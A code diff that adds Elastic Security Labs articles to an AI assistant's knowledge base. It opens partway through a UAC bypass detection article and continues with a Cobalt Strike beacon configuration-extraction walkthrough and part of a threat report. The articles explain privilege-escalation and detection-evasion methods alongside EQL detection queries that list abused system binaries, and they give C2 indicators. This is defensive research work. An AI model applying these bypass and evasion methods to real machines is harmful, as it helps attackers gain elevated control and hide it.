+An example of a UAC bypass that manipulates the Windows environment variables registry key is [byeintegrity5](https://github.com/AzAgarampur/byeintegrity5-uac). To illustrate this, this bypass uses this primitive to redirect the normal execution flow of the CDSSync scheduled task (set to **Run with highest privileges** ) and elevate the integrity level as shown below.
+
+![](/assets/images/exploring-windows-uac-bypasses-techniques-and-detection-strategies/exploring-windows-uac-bypasses-image5.jpg)
+
+When the CDSSync scheduled task is run, taskhostw.exe will try to load npmproxy.dll from the %windir%\System32 folder, but because the malware controls %windir%, it can redirect taskhostw.exe to load a DLL named npmproxy.dll from a path it controls as shown below.
+
+![](/assets/images/exploring-windows-uac-bypasses-techniques-and-detection-strategies/exploring-windows-uac-bypasses-image2.jpg)
+
+UAC bypasses based on environment variable manipulation often work when UAC is set to **Always Notify** (the maximum UAC level) as they often don’t involve writing files to secured paths or starting an autoElevated application. Changes to SystemRoot or Windir from the current user registry to non-expected values are very suspicious and should be a high-confidence signal for detection.
+
+## DLL Hijack
+
+The DLL hijack method usually consists of finding a missing DLL (often a missing dependency) or winning a DLL file write race by loading a malicious DLL into an elevated process. If UAC is enabled but not set to **Always Notify,** then malware can perform an elevated [IFileOperation](https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-ifileoperation) (no UAC prompt) to create/copy/rename or move a DLL file to a trusted path (i.e., System32), then trigger an elevated program to load the malicious DLL instead of the expected one.
+
+The IFileOperation is performed by dllhost.exe (COM Surrogate) with process.command_line containing the classId \{3AD05575-8857-4850-9277-11B85BDB8E09\}.
+
+![](/assets/images/exploring-windows-uac-bypasses-techniques-and-detection-strategies/exploring-windows-uac-bypasses-image23.jpg)
+
+We can use the following [EQL correlation](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-syntax.html) to link any file operation by dllhost.exe followed by loading a non-Microsoft signed DLL into a process running with system integrity:
+
+```
+EQL search - UAC bypass via IFileOperation (Medium to System Integrity)
+
+sequence by host.id
+ [file where event.action in ("creation", "overwrite", "rename",
+ "modification") and
+
+  /* IFileOperation are performed by DllHost */
+  process.name : "dllhost.exe" and user.id : "S-1-5-21-*" and
+
+  /* executable file dropped via NewItem, Rename, Move or
+  Copy IFileOperation */  (file.extension : "dll" or
+  file.Ext.header_bytes : "4d5a*") and
+
+  /* protected system paths usually abused via DLL search order hijack */
+  file.path : ("?:\\Windows\\system32\\*",
+               "?:\\Windows\\syswow64\\*",
+               "?:\\Program Files (x86)\\Microsoft\\*",
+               "?:\\Program Files\\Microsoft\\*"
+               )] by file.path
+ [library where
+  /* non MS signed DLL loaded by a System Process */
+  user.id : "S-1-5-18" and
+  process.executable :
+              ("?:\\Windows\\system32\\*",
+               "?:\\Windows\\syswow64\\*",
+               "?:\\Program Files (x86)\\Microsoft\\*",
+               "?:\\Program Files\\Microsoft\\*") and
+ not (dll.code_signature.subject_name : "Microsoft *" and
+      dll.code_signature.trusted == true)] by dll.path
+```
+
+This is an example detection of [UACME 30](https://github.com/hfiref0x/UACME/tree/v3.2.x) sideloading [wow64log.dll](http://waleedassar.blogspot.com/2013/01/wow64logdll.html) into an instance of WerFault.exe running as System (which provides a good direct jump from Medium to System integrity) shown below.
+
+![](/assets/images/exploring-windows-uac-bypasses-techniques-and-detection-strategies/exploring-windows-uac-bypasses-image8.jpg)
+
+If UAC is set to **Always Notify,** then finding a missing DLL or winning a file write race condition into a path writable by a Medium integrity process is a valid option. This is an [example](https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/) of UAC bypass hijacking the SilentCleanup scheduled task (via a file write race condition) which spawns a high integrity descendant process DismHost.exe executing from an AppData subfolder (writable by Medium integrity) and this is [another variation](https://github.com/EncodeGroup/UAC-SilentClean) that abuses the same task but for a missing dependency. api-ms-win-core-kernel32-legacy-l1.dll.
+
+![](/assets/images/exploring-windows-uac-bypasses-techniques-and-detection-strategies/exploring-windows-uac-bypasses-image22.jpg)
+
+Another DLL Hijack primitive that can achieve the same goal is to use [DLL loading redirection](https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection) via creating a folder within the same directory of the targeted elevated program (e.g. target_program.exe.local and dropping a DLL there that will be loaded instead of the expected one).
+
+This technique can be also used as a primitive for local privilege escalation in the case of a vulnerability that allows the creation of a folder (with a permissive Access Control List) to a controlled location such as described by [Jonas Lykkegård](https://twitter.com/jonasLyk) in this blog [From directory deletion to SYSTEM shell](https://secret.club/2020/04/23/directory-deletion-shell.html).
+
+```
+EQL search - Potential Privilege Escalation via DLL Redirection
+
+library where user.id : "S-1-5-18" and
+  dll.path : ("?:\\Windows\\system32\\*.exe.local\\*",
+              "?:\\Windows\\syswow64\\*.exe.local\\*",
+              "?:\\Program Files (x86)\\Microsoft\\*.exe.local\\*",
+              "?:\\Program Files\\Microsoft\\*.exe.local\\*") and
+ not (dll.code_signature.subject_name : "Microsoft *" and
+      dll.code_signature.trusted == true) and
+ process.executable :
+              ("?:\\Windows\\system32\\*",
+               "?:\\Windows\\syswow64\\*",
+               "?:\\Program Files (x86)\\Microsoft\\*",
+               "?:\\Program Files\\Microsoft\\*")
+```
+
+This query matches on [UACME](https://github.com/hfiref0x/UACME/tree/v3.2.x) method 22, which targets consent.exe (executing as System), tricking it into loading comctl32.dll from the SxS DotLocal directory instead of System32:
+
+![](/assets/images/exploring-windows-uac-bypasses-techniques-and-detection-strategies/exploring-windows-uac-bypasses-image14.jpg)
+
+> It’s worth also mentioning that the majority of UAC bypasses via DLL hijack are also useful for persistence and may bypass detection based on [autoruns](https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns) (known file and registry persistence locations).
+
+## Elevated COM Interface
+
+This method is a bit different from the previous ones, meaning no direct operation redirection is involved. Instead, it relies on finding an elevated COM interface that exposes some form of execution capabilities (i.e., CreateProcess / [ShellExec](https://gist.github.com/api0cradle/d4aaef39db0d845627d819b2b6b30512#file-akagi_41-c-L130) wrapper) that can be invoked to launch a privileged program passed via arguments from a medium integrity process.
+
+From a behavior perspective, usually, those COM interfaces will be executed under the context of dllhost.exe (COM Surrogate) with process.command_line containing the classId of the targeted COM object, this will usually result in the creation of a high integrity child process.
+
+Below are examples of different malware families adopting this method for UAC bypass (such as [DarkSide](https://malpedia.caad.fkie.fraunhofer.de/details/win.darkside) and [LockBit](https://malpedia.caad.fkie.fraunhofer.de/details/win.lockbit) ransomware families) to elevate integrity level before launching the encryption and evasion capabilities, which is good prevention choke point:
+
+![](/assets/images/exploring-windows-uac-bypasses-techniques-and-detection-strategies/exploring-windows-uac-bypasses-image6.jpg)
+
+## Token Security Attributes
+
+An insightful [observation](https://twitter.com/tiraniddo/status/1192583900645732352?lang=fr) was made by [James Forshaw](https://twitter.com/tiraniddo) for the possibility of leveraging process [token security attributes](https://github.com/processhacker/processhacker/blob/76d00575597c9c6baabcf2cbb81e7e099ac31f8f/phnt/include/ntseapi.h#L194-L204) to identify processes launched as descendants of an auto-elevated application.
+
+[ProcessHacker](https://github.com/processhacker/processhacker/blob/ac8578d86bbca9924e9cec2c09ec495d44a6f3fd/ProcessHacker/tokprp.c#L3118-L3171) also captures this type of information. Below is an example of Token Properties for a notepad.exe instance launched via the fodhelper UAC bypass.
+
+![](/assets/images/exploring-windows-uac-bypasses-techniques-and-detection-strategies/exploring-windows-uac-bypasses-image21.jpg)
+
+The LUA://HdAutoAp attribute means it’s an auto-elevated application (populated also for elevated COM objects and AppInfo hardcoded whitelisted processes). LUA://DecHdAutoAp means it’s a descendant of an auto elevated application, which is very useful when tracking the process tree generated via a UAC bypass.
+
+[Elastic Endpoint security 7.16](https://www.elastic.co/blog/whats-new-elastic-security-7-16-0) and above capture this information with process execution events (process.Ext.token.security_attributes) which open up the opportunity to hunt and detect UAC bypasses hijacking the execution flow of an auto-elevated program or COM Interface with no prior knowledge of the bypass specifics (targeted binary, COM Interface, redirection method, and other important details):
+
+Suspicious Auto Elevated Program Child Process:
+
+```
+EQL search - Detecting UAC bypass via Token Security Attributes
+
+process where event.action == "start" and
+   process.Ext.token.integrity_level_name : ("high", "system") and
+   process.parent.command_line != null and
+   /* descendant of an auto-elevated application or COM object */
+   process.Ext.token.security_attributes : "LUA://DecHdAutoAp" and
+    (
+      /* common lolbins, evasion and proxy execution programs */
+      process.pe.original_file_name :
+                 ("rundll32.exe",
+                  "cmd.exe",
+                  "pwsh*",
+                  "powershell.exe",
+                  "mshta.exe",
+                  "msbuild.exe",
+                  "regsvr32.exe",
+                  "powershell.exe",
+                  "cscript.exe",
+                  "wscript.exe",
+                  "wmic.exe",
+                  "installutil.exe",
+                  "msxsl.exe",
+                  "Microsoft.Workflow.Compiler.exe",
+                  "ieexec.exe",
+                  "iexpress.exe",
+                  "RegAsm.exe",
+                  "installutil.exe",
+                  "RegSvcs.exe",
+                  "RegAsm.exe",
+                  "javaw.exe",
+                  "reg.exe",
+                  "schtasks.exe",
+                  "sc.exe",
+                  "net.exe",
+                  "net1.exe",
+                  "vssadmin.exe",
+                  "bcdedit.exe",
+                  "wbadmin.exe",
+                  "msiexec.exe") or
+
+       /* suspicious or unusual paths */
+       process.executable : ("?:\\Windows\\Microsoft.NET\\*",
+                             "?:\\Users\\Public\\*",
+                             "?:\\Programdata\\*",
+                             "?:\\Windows\\Temp\\*",
+                             "?:\\Windows\\Tasks\\*",
+                             "?:\\Windows\\System32\\Tasks\\*") or
+
+       /* MS signed but from unusual paths */
+       (process.code_signature.trusted == true and
+        process.code_signature.subject_name : "Microsoft *" and
+        not process.executable : ("?:\\Windows\\system32\\*.exe",
+                                  "?:\\Windows\\SysWOW64\\*.exe",
+                                  "?:\\Program Files\\*.exe",
+                                  "?:\\Program Files (x86)\\*",
+                                  "?:\\ProgramData\\Microsoft\\*",
+                      "\\Device\\HarddiskVolume*\\Windows\\System32\\*.exe",
+                      "\\Device\\HarddiskVolume*\\Windows\\SysWOW64\\*.exe") and
+
+        /* runs from temp folder and invoked by different elevated processes */
+        not process.pe.original_file_name == "DismHost.exe"
+       ) or
+
+    /* elevated and unsigned or untrusted programs excluding
+      third party uninstallers executed via appwiz.cpl */
+      ((process.code_signature.trusted == false or
+      process.code_signature.exists == false) and
+        not (process.parent.name : "dllhost.exe" and
+          process.parent.command_line :
+          "*FCC74B77-EC3E-4DD8-A80B-008A702075A9*"))) and
+
+  /* Rundll32 FPs */
+  not (process.name : "rundll32.exe" and
+       process.args :
+         ("devmgr.dll,DeviceProperties_RunDLL",
+         "?:\\Windows\\system32\\iesetup.dll,IEShowHardeningDialog") and
+       process.parent.name : ("dllhost.exe", "ServerManager.exe")) and
+
+  /* uninstallers executed via appwiz.cpl */
+  not (process.args : "/uninstall" and
+       process.parent.name : "dllhost.exe" and
+       process.parent.command_line : "*FCC74B77-EC3E-4DD8-A80B-008A702075A9*")
+       and
+
+  /* server manager may spawn interactive powershell commands */
+  not (process.name : "powershell.exe" and
+       process.parent.executable : "?:\\Windows\\System32\\ServerManager.exe")
+       and
+
+ /* Windows Installer service descendants */
+ not (process.parent.executable : "?:\\Windows\\System32\\msiexec.exe" and
+      process.parent.args : "/V")
+```
+
+The above query also matches on all the descendants of a UAC bypass and not only the direct child process.
+
+Here we can see this approach detecting the fodhelper execution flow hijacking via registry key manipulation:
+
+![](/assets/images/exploring-windows-uac-bypasses-techniques-and-detection-strategies/exploring-windows-uac-bypasses-image10.jpg)
+
+Here is an example of this matching UAC Bypass by [Mocking Trusted Directories](https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e).
+
+![](/assets/images/exploring-windows-uac-bypasses-techniques-and-detection-strategies/exploring-windows-uac-bypasses-image15.jpg)
+
+Below are examples of matches for 3 different UAC bypasses via Elevated COM Interface:
+
+![](/assets/images/exploring-windows-uac-bypasses-techniques-and-detection-strategies/exploring-windows-uac-bypasses-image17.jpg)
+
+## Detection Evasion
+
+A good number of evasion techniques that are not limited to UAC bypass were discussed in [this](https://swapcontext.blogspot.com/2020/10/uacme-35-wd-and-ways-of-mitigation.html) blog post by [hFireF0X](https://twitter.com/hFireF0X) such as renaming a folder or registry key, registry symbolic links to break detection logic based on specific file path/registry key changes or correlation of different events by the same process. Although the majority of malware families don’t bother to modify and tune those techniques, accounting for those evasion opportunities is a must for more resilience.
+
+Below is an example of file monitoring evasion via directory rename ([UACME 22](https://github.com/hfiref0x/UACME/tree/v3.2.x)).
+
+![](/assets/images/exploring-windows-uac-bypasses-techniques-and-detection-strategies/exploring-windows-uac-bypasses-image11.jpg)
+
+Here is an example of registry key path monitoring evasion via key rename ([byeintegrity8](https://github.com/AzAgarampur/byeintegrity8-uac)).
+
+![](/assets/images/exploring-windows-uac-bypasses-techniques-and-detection-strategies/exploring-windows-uac-bypasses-image7.jpg)
+
+Another interesting evasion trick that was added recently to [UACME v.3.5.7](https://github.com/hfiref0x/UACME/commit/75b39e214ef6c2e37f04463f89aa0433afb2b08a#diff-b88fec8a22ebca61cc2ebfb4b0e1549b50fd179f262228e018ab2463cb4efc56R567) is the [CurVer](https://docs.microsoft.com/en-us/windows/win32/shell/fa-progids) subkey, which can be used to redirect the shell Default handler. This effectively bypasses detections looking for hardcoded suspicious registry path/values:
+
+![](/assets/images/exploring-windows-uac-bypasses-techniques-and-detection-strategies/exploring-windows-uac-bypasses-image9.jpg)
+
+For file-based detection related to DLL hijacking, it is better to use DLL load events ([Elastic Endpoint Security 7.16](https://www.elastic.co/blog/whats-new-elastic-security-7-16-0) logs non-Microsoft signed DLLs). For registry ones, a mix of registry.data.strings, and value names should be a bit more resilient than the full key path.
+
+The example [EQL correlation](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-syntax.html) below shows how to detect DLL loading from a directory masquerading as System32 (i.e as a result of windir/systemroot environment variable modification):
+
+```
+EQL search - Detect redirection via rogue Windir/SystemRoot
+
+sequence by process.entity_id with maxspan=1m
+  [process where event.action == "start" and
+    /* any process running as high or system integrity */
+    process.Ext.token.integrity_level_name : ("high", "system")]
+  [library where dll.path :
+    /* masquerading as windir/system root */
+    ("?:\\*\\System32\\*.dll", "?:\\*\\SysWOW64\\*.dll") and
+    not dll.path :
+           ("?:\\Windows\\System32\\*.dll","?:\\Windows\\Syswow64\\*.dll") and
+    not (dll.code_signature.subject_name : "Microsoft *" and
+         dll.code_signature.trusted == true)]
+
+```
+
+This example shows matches for 2 different techniques (registry key manipulation and DLL hijack via fake Windir):
+
+![](/assets/images/exploring-windows-uac-bypasses-techniques-and-detection-strategies/exploring-windows-uac-bypasses-image18.jpg)
+
+The next example combines a [registry symbolic link](https://scorpiosoftware.net/2020/07/17/creating-registry-links/) and registry key rename to evade fodhelper UAC bypass detection based on registry key changes monitoring (ms-settings or shell\open\command):
+
+![](/assets/images/exploring-windows-uac-bypasses-techniques-and-detection-strategies/exploring-windows-uac-bypasses-image3.jpg)
+
+[UACME v.3.5](https://github.com/hfiref0x/UACME) and above [implements](https://github.com/hfiref0x/UACME/commit/e9495cfd2ff074ca8d4a3722428212e09c981817#diff-b88fec8a22ebca61cc2ebfb4b0e1549b50fd179f262228e018ab2463cb4efc56R163) this evasion for methods involving registry key manipulation.
+
+You can hunt using Elastic Endpoint or Sysmon logs registry symbolic link creation by looking for registry modification with value name equal to SymbolicLinkValue.
+
+An example KQL query to detect this evasion is: registry.value :"SymbolicLinkValue" and registry.key :S-1-5-21-15_Classes\_\*`:
+
+![](/assets/images/exploring-windows-uac-bypasses-techniques-and-detection-strategies/exploring-windows-uac-bypasses-image1.jpg)
+
+## Most Common UAC Bypasses
+
+Malware families in use in the wild constantly shift and change. Below you can see a quick overview of the top commonly observed UAC bypass methods used by malware families:
+
+| Method                                                | Malware Family              |
+| ----------------------------------------------------- | --------------------------- |
+| UAC Bypass via ICMLuaUtil Elevated COM Interface      | DarkSide, LockBit, TrickBot |
+| UAC Bypass via ComputerDefaults Execution Hijack      | ClipBanker, Quasar RAT      |
+| UAC Bypass via Control Panel Execution Hijack         | AveMaria, Trojan.Mardom     |
+| UAC Bypass via DiskCleanup Scheduled Task Hijack      | RedLine Stealer, Glupteba   |
+| UAC Bypass via FodHelper Execution Hijack             | Glupteba, BitAT dropper     |
+| UAC Bypass Attempt via Windows Directory Masquerading | Remcos RAT                  |
+
+![](/assets/images/exploring-windows-uac-bypasses-techniques-and-detection-strategies/exploring-windows-uac-bypasses-image4.jpg)
+
+Most common executed commands via a UAC bypass are either the malware re-execute itself as high integrity or defense evasions techniques such as:
+
+- Tamper with AV exclusions or state
+- Writing to HKLM protected registry keys
+- Tamper with system recovery settings
+
+## Conclusion
+
+Designing detections by focusing on key building blocks of an offensive technique is much more cost-effective than trying to cover the endless variety of implementations and potential evasion tunings. In this post, we covered the main methods used for UAC bypass and how to detect them as well as how enriching process execution events with token security attributes enabled us to create a broader detection logic that may match unknown bypasses.
+
+In addition to the broader detections highlighted in this blog post, Elastic Endpoint Security comes with 26 prebuilt endpoint behavior protections for UAC bypasses.
+
+## References
+
+- [https://github.com/hfiref0x/UACME](https://github.com/hfiref0x/UACME) (and its sub references)
+- [https://swapcontext.blogspot.com/2020/10/uacme-35-wd-and-ways-of-mitigation.html](https://swapcontext.blogspot.com/2020/10/uacme-35-wd-and-ways-of-mitigation.html)
+- [https://tyranidslair.blogspot.no/2017/05/reading-your-way-around-uac-part-1.html](https://tyranidslair.blogspot.no/2017/05/reading-your-way-around-uac-part-1.html)
+- [https://tyranidslair.blogspot.no/2017/05/reading-your-way-around-uac-part-2.html](https://tyranidslair.blogspot.no/2017/05/reading-your-way-around-uac-part-2.html)
+- [https://tyranidslair.blogspot.no/2017/05/reading-your-way-around-uac-part-3.html](https://tyranidslair.blogspot.no/2017/05/reading-your-way-around-uac-part-3.html)
+- [https://www.tiraniddo.dev/2017/05/exploiting-environment-variables-in.html](https://www.tiraniddo.dev/2017/05/exploiting-environment-variables-in.html)
+- [https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e](https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e)
+- [https://github.com/AzAgarampur/byeintegrity5-uac](https://github.com/AzAgarampur/byeintegrity5-uac)
+- [https://github.com/AzAgarampur/byeintegrity8-uac](https://github.com/AzAgarampur/byeintegrity8-uac)
+- [https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/](https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/)
+- [https://docs.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control](https://docs.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control)
+- [https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works)
+- [https://googleprojectzero.blogspot.com/2019/12/calling-local-windows-rpc-servers-from.html](https://googleprojectzero.blogspot.com/2019/12/calling-local-windows-rpc-servers-from.html)
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/extracting_cobalt_strike_beacon_configurations.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/extracting_cobalt_strike_beacon_configurations.md
new file mode 100644
index 0000000000000..6264d0395918a
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/extracting_cobalt_strike_beacon_configurations.md
@@ -0,0 +1,160 @@
+---
+title: "Extracting Cobalt Strike Beacon Configurations"
+slug: "extracting-cobalt-strike-beacon-configurations"
+date: "2022-09-09"
+description: "Part 2 - Extracting configurations from Cobalt Strike implant beacons."
+author:
+  - slug: daniel-stepanic
+  - slug: derek-ditch
+  - slug: seth-goodwin
+  - slug: andrew-pease
+image: "photo-edited-03@2x.jpg"
+category:
+tags:
+  - cobalt strike
+---
+
+Please check out our [previous post](https://www.elastic.co/security-labs/collecting-cobalt-strike-beacons-with-the-elastic-stack) on how to collect Cobalt Strike beacon implants. We'll build on that information to extract the configurations from the beacons.
+
+In this post, we'll walk through manually analyzing a Cobalt Strike C2 configuration from a binary beacon payload using the excellent [Cobalt Strike Configuration Extractor (CSCE)](https://github.com/strozfriedberg/cobaltstrike-config-extractor). We'll also cover enabling some newer features of the Elastic Stack that will allow you to do this at scale across all your monitored endpoints, by extracting the beacons from memory.
+
+> The team at Blackberry has a tremendous handbook called “[Finding Beacons in the Dark](https://www.blackberry.com/us/en/forms/enterprise/ebook-beacons-in-the-dark)” (registration required) that dives extensively into Cobalt Strike beacon configurations. We’ll discuss a few fields in the configurations here, but if you’re interested in learning about how beacons function, we strongly recommend checking that resource out.
+
+## Cobalt Strike Configuration Extractor
+
+The [Cobalt Strike Configuration Extractor (CSCE)](https://github.com/strozfriedberg/cobaltstrike-config-extractor) by Stroz Friedberg is a "python library and set of scripts to extract and parse configurations from Cobalt Strike beacons".
+
+To use the CSCE, we'll create a Python virtual environment, activate it, and install the CSCE Python package.
+
+## Setting up the Cobalt Strike Configuration Extractor
+
+```
+$ python3 -m venv csce
+
+$ source csce/bin/activate
+
+(csce) $ pip3 install libcsce
+
+...truncated...
+Collecting libcsce
+  Using cached libcsce-0.1.0-py3-none-any.whl (24 kB)
+Collecting pefile>=2019.4.18
+...truncated...
+```
+
+Next, we can run the CSCE on the beacon payload we extracted from memory to see if there's any interesting information stored we can collect (we'll add the `--pretty` flag to make the output easier to read as a JSON document).
+
+## Viewing the atomic indicators of the CS beacon configuration
+
+```
+(csce) $ csce --pretty beacon.exe
+
+{
+  "beacontype": [
+    "HTTPS"
+  ],
+  "sleeptime": 45000,
+  "jitter": 37,
+  "maxgetsize": 1403644,
+  "spawnto": "GNEtW6h/g4dQzm0dOkL5NA==",
+  "license_id": 334850267,
+  "cfg_caution": false,
+  "kill_date": "2021-12-24",
+  "server": {
+    "hostname": "clevelandclinic[.]cloud",
+    "port": 443,
+    "publickey": "MIGfMA0GCSqGSIb3DQEBAQUAA4G...
+...truncated...
+```
+
+Immediately, we can see that the beacon uses HTTPS to communicate and that the domain is `clevelandclinic[.]cloud`. This gives us an atomic indicator that we can do some analysis on. Looking at the [Malleable Command and Control documentation](https://www.cobaltstrike.com/help-malleable-c2), we can get a description of the configuration variables.
+
+As an example, we can see that the `sleeptime` is `450000` milliseconds, which changes the default beacon check in from every 60-seconds to 450-seconds, or 7 ½ minutes. Additionally, we see a jitter of `37` meaning that there is a random jitter of 37% of `450000` milliseconds (`166,500` milliseconds), so the beacon check-in could be between `283,000` and `450,000` milliseconds (4.7 - 7.5 minutes).
+
+Additionally, the `publickey` field is used by the Cobalt Strike Team Server to encrypt communications between the server and the beacon. This is different from normal TLS certificates used when accessing the C2 domain with a browser or data-transfer libraries, like `cURL`. This field is of note because the Team Server uses the same publickey for each beacon, so this field is valuable in clustering beacons with their perspective Team Server because threat actors often use the same Team Server for multiple campaigns, so this data from the configuration can be used to link threat actors to multiple campaigns and infrastructure.
+
+Continuing to look at the configuration output, we can see another interesting section around the `process-inject` nested field, `stub`:
+
+## Viewing the process-inject.stub field
+
+```
+(csce) $ csce --pretty beacon.exe
+
+...truncated...
+  "process-inject": {
+    "allocator": "NtMapViewOfSection",
+    "execute": [
+      "CreateThread 'ntdll!RtlUserThreadStart'",
+      "CreateThread",
+      "NtQueueApcThread-s",
+      "CreateRemoteThread",
+      "RtlCreateUserThread"
+    ],
+    "min_alloc": 17500,
+    "startrwx": false,
+    "stub": "IiuPJ9vfuo3dVZ7son6mSA==",
+    "transform-x86": [
+      "prepend '\\x90\\x90'"
+    ],
+...
+```
+
+The `stub` field contains the Base64 encoded MD5 file hash of the Cobalt Strike Java archive. To convert this, we can again use CyberChef, this time add the "From Base64" and "To Hex" [recipes](<https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)To_Hex('None',0)>), ensure you change the "Delimiter" to "None" in the "To Hex" recipe.
+
+![](/assets/images/extracting-cobalt-strike-beacon-configurations/cyber-chef-md5.jpg)
+
+Now that we have the MD5 value of the Java archive (`222b8f27dbdfba8ddd559eeca27ea648`), we can check that against online databases like VirusTotal to get additional information, specifically, the SHA256 hash (`7af9c759ac78da920395debb443b9007fdf51fa66a48f0fbdaafb30b00a8a858`).
+
+![](/assets/images/extracting-cobalt-strike-beacon-configurations/cobaltstrike-jar-sha256.jpg)
+
+Finally, we can verify the SHA256 hash with CobaltStrike to identify the version of the Java archive by going to [https://verify.cobaltstrike.com](https://verify.cobaltstrike.com) and searching for the hash.
+
+![](/assets/images/extracting-cobalt-strike-beacon-configurations/cobaltstrike-jar-version.jpg)
+
+Now we know that this beacon was created using a licensed version of Cobalt Strike 4.4.
+
+Another field from the configuration that is helpful in clustering activity is the `license_id` field.
+
+## Viewing Cobalt Strike watermark
+
+```
+...truncated
+  "spawnto": "GNEtW6h/g4dQzm0dOkL5NA==",
+  "license_id": 334850267,
+  "cfg_caution": false,
+...truncated...
+```
+
+This is commonly referred to as the Watermark and is a 9-digit value that is unique per license. While this value can be modified, it can still be used in conjunction with the `process-inject.stub` and `publickey` fields (discussed above) to cluster infrastructure and activity groups.
+
+These are just a few fields that can be used to identify and cluster activities using configurations extracted from the Cobalt Strike beacon. If you're interested in a very in-depth analysis of the configuration, we recommend you check out the [Finding Beacons in the Dark Cobalt Strike handbook by the team at Blackberry](https://www.blackberry.com/us/en/forms/enterprise/ebook-beacons-in-the-dark).
+
+## Putting Analysis to Action
+
+To test out our analyst playbook for collecting Cobalt Strike beacon payloads, their configurations, and metadata contained within; we can apply those to more data to identify clusters of activity.
+
+![](/assets/images/extracting-cobalt-strike-beacon-configurations/maltego.jpg)
+
+In the above illustration, we can cluster threat actors based on their shared uses of the beacon payload public key, which as we described above, is unique per Team Server. This would allow us to group multiple beacon payload hashes, infrastructure, and campaigns to a single Threat Actor.
+
+As always, using the atomic indicators extracted from the beacon payload configurations (`clevelandclinic[.]cloud` in our example) allow you to identify additional shared infrastructure, target verticals, and threat actor capabilities.
+
+### This time at full speed
+
+All of the steps that we've highlighted in this release, as well as the [previous release](https://www.elastic.co/security-labs/collecting-cobalt-strike-beacons-with-the-elastic-stack), can be automated and written into Elasticsearch using the [Cobalt Strike Beacon Extraction](https://www.elastic.co/security-labs/cobalt-strike-beacon-extractor) project.
+
+![](/assets/images/extracting-cobalt-strike-beacon-configurations/cs-to-elasticsearch.jpg)
+
+## Summary
+
+In this post, we highlighted new features in the Elastic Stack that can be used to collect Cobalt Strike Malleable C2 beacon payloads. Additionally, we covered the processes to build Fleet policies to extract beacon payloads from memory and their configurations.
+
+These Fleet policies and processes enable security analysts to collect Cobalt Strike beacon payloads and their configurations to identify threat actor controlled infrastructure and cluster activity.
+
+## Artifacts
+
+Observable | Type | Note -------------------------------------------------------------------|-------------|------------------------------------------ `697fddfc5195828777622236f2b133c0a24a6d0dc539ae7da41798c4456a3f89` | SHA256 | Cobalt Strike Malleable C2 beacon payload `7475a6c08fa90e7af36fd7aa76be6e06b9e887bc0a6501914688a87a43ac7ac4` | SHA256 | Cobalt Strike Malleable C2 beacon payload `f9b38c422a89d73ebdab7c142c8920690ee3a746fc4eea9175d745183c946fc5` | SHA256 | Cobalt Strike Malleable C2 beacon payload `clevelandclinic[.]cloud` | domain-name | Cobalt Strike Malleable C2 domain `104[.]197[.]142[.]19` | ipv4-addr | Cobalt Strike Malleable C2 IP address `192[.]64[.]119[.]19` | ipv4-addr | Cobalt Strike Malleable C2 IP address
+
+## Artifacts
+
+Artifacts are also available for [download](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9ba95a979c5a3026/628e88d904574953584774c8/extracting-cobalt-strike-indicators.zip) in both ECS and STIX format in a combined zip bundle.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/fall_2023_global_threat_report_outro.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/fall_2023_global_threat_report_outro.md
new file mode 100644
index 0000000000000..d11f4e9a109c3
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/fall_2023_global_threat_report_outro.md
@@ -0,0 +1,58 @@
+---
+title: "Fall 2023 Global Threat Report Outro"
+slug: "fall-2023-global-threat-report-outro"
+date: "2023-10-19"
+description: "This article highlights the essential contributions to the Global Threat Report from the Security Intelligence team, and describes three major phenomena impacting the threat landscape."
+author:
+  - slug: devon-kerr
+image: "image4.png"
+category:
+  - slug: reports
+tags:
+  - gtr
+---
+
+After months of diligent work, Elastic Security Labs is excited to announce the publication of the [October 2023 Global Threat Report](https://www.elastic.co/explore/security-without-limits/2023-global-threat-report). For our second annual publication of this kind, we knew it was going to be a greater effort– not only did the volume of events increase more than 1000%, we had entirely new types and depth of visibility from features released since our inaugural report.
+
+It goes without saying (but let’s say it for good measure) that none of this would be possible without our users sharing more than one billion security events each year with us. And it certainly wouldn’t be possible without our Elastic colleagues who make our powerful world-spanning capability. 
+
+One essential contributor is the Threat Research and Detection Engineering team (TRaDE), who develop features like rules and investigation guides, and assigned the legendary [Terrance DeJesus](https://twitter.com/_xDeJesus). Terrance was instrumental in creating the inaugural report, applying his [cloud attack surface expertise](https://www.elastic.co/security-labs/google-workspace-attack-surface-part-one) and security operations experience to this process. Another crucial team is Security Data Analytics (SDA), which is responsible for all the systems that enable us to analyze telemetry. [Chris Donaher](https://twitter.com/c_donaher) leads SDA by day (also by night, technically), and helped us comb through hundreds of millions of events this year. 
+
+The work from these teams and the rest of Elastic Security Labs shows our commitment to providing security teams with actionable intelligence about threat phenomena so they can better prepare for, resist, and evict threats. By democratizing access to knowledge and resources, including publications like the Global Threat Report, we hope to demonstrate a more effective way to improve security outcomes. We’re more secure together and we can’t succeed without each other.
+
+In our observations, we identified the following factors as reactions to security innovations that are making environments hostile to threats:
+ - Heavy adversary investments in defense evasion like using built-in execution proxies to run malicious code, masquerading as legitimate software, and software supply-chain compromise
